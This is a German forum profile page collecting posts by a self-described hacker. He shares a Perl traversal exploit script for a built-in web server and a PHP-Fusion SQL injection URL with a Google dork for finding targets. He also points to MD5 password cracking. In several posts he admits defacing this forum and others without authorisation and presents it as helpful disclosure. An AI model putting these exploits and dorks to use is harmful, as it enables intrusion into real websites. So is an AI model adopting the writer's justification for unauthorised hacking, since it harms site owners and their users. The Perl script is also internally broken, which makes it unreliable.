user_db's lassen sich auch ziemlich gut gebrauchen. Vorallem von Erwachsenen.
Beiträge von G4nv3r
-
-
Ach ja... Ich mache z.B. auch sowas wie folgendes.
Perl
Alles anzeigen#!/usr/bin/perl use IO::Socket; print q { built-in web server remote user traversal Exploit Author: G4nv3r Visit: www.hackschool.dl.am Example: biwsrute.pl <target> - targethost ########################################################### # # # http://securitytracker.com/alerts/2006/May/1016109.html # # # ########################################################### }; $addr = $ARGV[0]; $dir = 'C:%5C/'; print "Target: $addr\n"; print "[~] Connecting with target...\n"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$addr", PeerPort=>"8080") || die "[-] Connection failed :-(\n"; print "[+] Connected!\n"; print $socket "GET / HTTP/1.1\n"; $remote_user = "http://.$addr.$dir"; print $sock "GET $remote_user HTTP/1.1\n"; close($sock);
...und
Code
Alles anzeigen---------------------------------------------------------------- I found a vulnerability in PHP-Fusion 6.00.307 G4nv3r www.hackschool.dl.am ---------------------------------------------------------------- [-] Exploit: http://www.target.com/setuser.php?cat="(user_id)", "users", "user_name='$user_name' AND user_password='$user_pass'" [-] Googledork: inurl:/phpfusion/setuser.php
-
Ja, diesen Deal nehme ich an. Bis jetzt konnte ich keine weitere Lücke finden. Die links.php, in der es auch eine SQL Injection gibt ist zwar vorhanden, allerdings hier ohne SQL Injection.
-
Ego-Boost habe ich absolut nicht nötig! Als wir die Administratoren damals mit E-Mails auf ihre Schwachstellen aufmerksam machen wollten, hat keiner reagiert. Also defacen wir lediglich die index.php oder versetzen das Board in den Wartungsmodus.
-
Dann fang' du direkt damit an.
-
Vielen Dank! Sowas hört man selten...
-
Aehhhm... meine Signatur ist bitte als reinste Satire anzusehen. Ich habe meine "mentale Power" bereits an Nazi-Websites ausgelassen. Siehe http://www.tagesschau.de/aktue…0,1185,OID4157040,00.html
-
Ich verstehe euch auch nicht! Immer diese verdammten Vorurteile gegen uns. Ihr kennt uns überhaupt nicht richtig. Im Gegensatz zu vielen anderen Menschen sind wir ehrlich und hilfsbereit. Mit solchen Hacks möchte ich z.B. euer Projekt vor wirklich kriminellen Hackern (Crackern) schützen. Wenn ich richtig fies gewesen wäre, dann hätte ich alles geschrottet. Aber weil ich ein guter Mensch sein möchte habe ich es nicht getan.
-
*LOL* Nein uns geht dabei keiner ab. Ich wollte damit keinen Schaden anrichten, sondern wollte lediglich auf die SQL Injection in der calendar.php aufmerksam machen. Ich habe nur die index.php defaced (verändert) und mehr nicht! Ich habe nichts gelöscht und nichts weiteres verändert. Aber sowas wie auf den folgenden Screenshots zu sehen ist darf eigentlich nicht möglich sein.
-
Guten Morgen Freunde! Ich bin der G4nv3r, der damals euer Board gehackt hat. Ich wollte damit keinen Schaden anrichten, sondern lediglich auf die SQL Injection in der calendar.php aufmerksam machen. Aber dieser JC oder wie er heisst...*OMG* 128Bit, MD5 verschlüsselte Passwörter kann man sehr wohl cracken. Entweder man macht es kiddiehaft bei http://www.milw0rm.com/cracker oder man nutzt eigene Rainbowtables.